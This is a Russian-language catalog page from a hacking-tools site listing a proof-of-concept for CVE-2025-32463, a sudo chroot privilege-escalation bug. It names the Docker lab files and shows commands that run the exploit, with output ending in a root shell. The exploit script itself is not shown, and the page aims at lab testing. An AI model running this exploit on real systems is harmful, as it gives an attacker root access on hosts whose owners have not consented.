Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32463_POC — Эксплойт (proof-of-concept) для CVE-2025-32463, уязвимости повышения привилегий в функции chroot sudo. Включает среду Docker и скрипт эксплойта для получения root-оболочки. | Kitploit
Инструменты/GitHubGitHub/zhaduchanhzz/cve-2025-32463_poc
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubzhaduchanhzz/cve-2025-32463_poc

CVE-2025-32463_POC

Эксплойт (proof-of-concept) для CVE-2025-32463, уязвимости повышения привилегий в функции chroot sudo. Включает среду Docker и скрипт эксплойта для получения root-оболочки.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
41 год назадЕщё не проверено

CVE-2025-32463 – sudo chroot ("chwoot") PoC

Этот репозиторий предоставляет минимальную, воспроизводимую среду для демонстрации уязвимости повышения привилегий CVE‑2025‑32463 в функции sudo chroot.


Содержимое

ФайлНазначение
DockerfileСоздаёт образ Ubuntu 24.04 с уязвимой версией sudo 1.9.16p2 и инструментами сборки
sudo‑chwoot.shЭксплойт proof‑of‑concept, который запускает root‑оболочку внутри chroot
run.shВспомогательный скрипт, который собирает образ (если необходимо) и запускает контейнер с эксплойтом

Уязвимые версии

Уязвимые сборки sudo 1.9.14 – 1.9.17 (все p‑ревизии) на большинстве дистрибутивов Linux подвержены уязвимости.


Быстрый старт

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)

run.sh передаёт --privileged и --rm в Docker, чтобы контейнер очищался после выхода.


Очистка

Удалите образ, когда закончите:

root@kitploit:~
docker rmi sudo-chwoot

Ссылки

  • Примечание об уязвимости от Stratascale CRU: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Скачать инструмент